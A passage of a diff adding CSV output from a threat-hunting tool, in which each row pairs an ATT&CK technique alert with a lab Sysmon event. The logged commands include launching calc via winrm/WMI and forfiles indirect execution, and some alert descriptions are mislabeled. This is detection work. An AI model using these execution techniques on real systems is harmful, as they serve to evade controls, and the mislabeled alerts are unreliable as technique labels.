+    <Data Name=""CommandLine"">calc</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6642-5D3F-0000-001044A68A00</Data>
+    <Data Name=""ParentProcessId"">2996</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-04-25T22:19:37.209189Z"">
+    </TimeCreated>
+    <EventRecordID>27803</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3572"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-04-25 22:19:27.149</Data>
+    <Data Name=""ProcessGuid"">747F3D96-B76F-5EA4-0000-0010624D0600</Data>
+    <Data Name=""ProcessId"">5840</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-B767-5EA4-0000-00209BD30100</Data>
+    <Data Name=""LogonId"">0x1d39b</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-B769-5EA4-0000-001000800300</Data>
+    <Data Name=""ParentProcessId"">4472</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-04-25T22:19:37.209189Z"">
+    </TimeCreated>
+    <EventRecordID>27803</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3572"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-04-25 22:19:27.149</Data>
+    <Data Name=""ProcessGuid"">747F3D96-B76F-5EA4-0000-0010624D0600</Data>
+    <Data Name=""ProcessId"">5840</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-B767-5EA4-0000-00209BD30100</Data>
+    <Data Name=""LogonId"">0x1d39b</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-B769-5EA4-0000-001000800300</Data>
+    <Data Name=""ParentProcessId"">4472</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1059 ] wscript or cscript runing script,1564436075.91801,2019-07-30T01:34:35.918010+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript  //nologo &quot;C:\Windows\System32\winrm.vbs&quot; i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd  /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:35.878709Z"">
+    </TimeCreated>
+    <EventRecordID>4994</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:35.763</Data>
+    <Data Name=""ProcessGuid"">747F3D96-666B-5D3F-0000-0010EF858E00</Data>
+    <Data Name=""ProcessId"">264</Data>
+    <Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""FileVersion"">5.812.10240.16384</Data>
+    <Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
+    <Data Name=""Product"">Microsoft ® Windows Script Host</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cscript  //nologo &quot;C:\Windows\System32\winrm.vbs&quot; i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-666B-5D3F-0000-001033648E00</Data>
+    <Data Name=""ParentProcessId"">1580</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1564436075.91801,2019-07-30T01:34:35.918010+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cscript.exe ) through command line ( cscript  //nologo &quot;C:\Windows\System32\winrm.vbs&quot; i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;} ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:35.878709Z"">
+    </TimeCreated>
+    <EventRecordID>4994</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:35.763</Data>
+    <Data Name=""ProcessGuid"">747F3D96-666B-5D3F-0000-0010EF858E00</Data>
+    <Data Name=""ProcessId"">264</Data>
+    <Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""FileVersion"">5.812.10240.16384</Data>
+    <Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
+    <Data Name=""Product"">Microsoft ® Windows Script Host</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cscript  //nologo &quot;C:\Windows\System32\winrm.vbs&quot; i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-666B-5D3F-0000-001033648E00</Data>
+    <Data Name=""ParentProcessId"">1580</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1059 ] wscript or cscript runing script,1564436075.878709,2019-07-30T01:34:35.878709+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript  //nologo &quot;C:\Windows\System32\winrm.vbs&quot; qc -q) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd  /c winrm qc -q) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:35.838188Z"">
+    </TimeCreated>
+    <EventRecordID>4993</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:35.663</Data>
+    <Data Name=""ProcessGuid"">747F3D96-666B-5D3F-0000-00102F7F8E00</Data>
+    <Data Name=""ProcessId"">3224</Data>
+    <Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""FileVersion"">5.812.10240.16384</Data>
+    <Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
+    <Data Name=""Product"">Microsoft ® Windows Script Host</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cscript  //nologo &quot;C:\Windows\System32\winrm.vbs&quot; qc -q</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-666B-5D3F-0000-001051638E00</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c winrm qc -q </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436075.34771,2019-07-30T01:34:35.347710+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;} ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:35.337716Z"">
+    </TimeCreated>
+    <EventRecordID>4991</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:35.285</Data>
+    <Data Name=""ProcessGuid"">747F3D96-666B-5D3F-0000-001033648E00</Data>
+    <Data Name=""ProcessId"">1580</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1564436075.34771,2019-07-30T01:34:35.347710+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;} ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:35.337716Z"">
+    </TimeCreated>
+    <EventRecordID>4991</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:35.285</Data>
+    <Data Name=""ProcessGuid"">747F3D96-666B-5D3F-0000-001033648E00</Data>
+    <Data Name=""ProcessId"">1580</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436075.337716,2019-07-30T01:34:35.337716+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c winrm qc -q ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:35.313087Z"">
+    </TimeCreated>
+    <EventRecordID>4990</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:35.246</Data>
+    <Data Name=""ProcessGuid"">747F3D96-666B-5D3F-0000-001051638E00</Data>
+    <Data Name=""ProcessId"">5840</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c winrm qc -q </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1553029831.815313,2019-03-20T01:10:31.815313+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\schtasks.exe ) through command line ( C:\Windows\system32\schtasks.exe /delete /f /TN &quot;Microsoft\Windows\Customer Experience Improvement Program\Uploader&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T21:00:01.539020Z"">
+    </TimeCreated>
+    <EventRecordID>1966503</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 21:00:01.529</Data>
+    <Data Name=""ProcessGuid"">365ABB72-5851-5C91-0000-00107D050A00</Data>
+    <Data Name=""ProcessId"">2716</Data>
+    <Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Manages scheduled tasks</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\schtasks.exe /delete /f /TN &quot;Microsoft\Windows\Customer Experience Improvement Program\Uploader&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-528D-5C91-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">MD5=2003E9B15E1C502B146DAD2E383AC1E3,IMPHASH=D92C80D49382091310FB8DB089F856A9</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-5851-5C91-0000-0010E1030A00</Data>
+    <Data Name=""ParentProcessId"">2772</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wsqmcons.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\System32\wsqmcons.exe </Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1202] Indirect Command Execution,1564436070.807635,2019-07-30T01:34:30.807635+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles  /p c:\windows\system32 /m notepad.exe /c calc.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:30.685271Z"">
+    </TimeCreated>
+    <EventRecordID>4988</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:30.462</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6666-5D3F-0000-0010AE068E00</Data>
+    <Data Name=""ProcessId"">1464</Data>
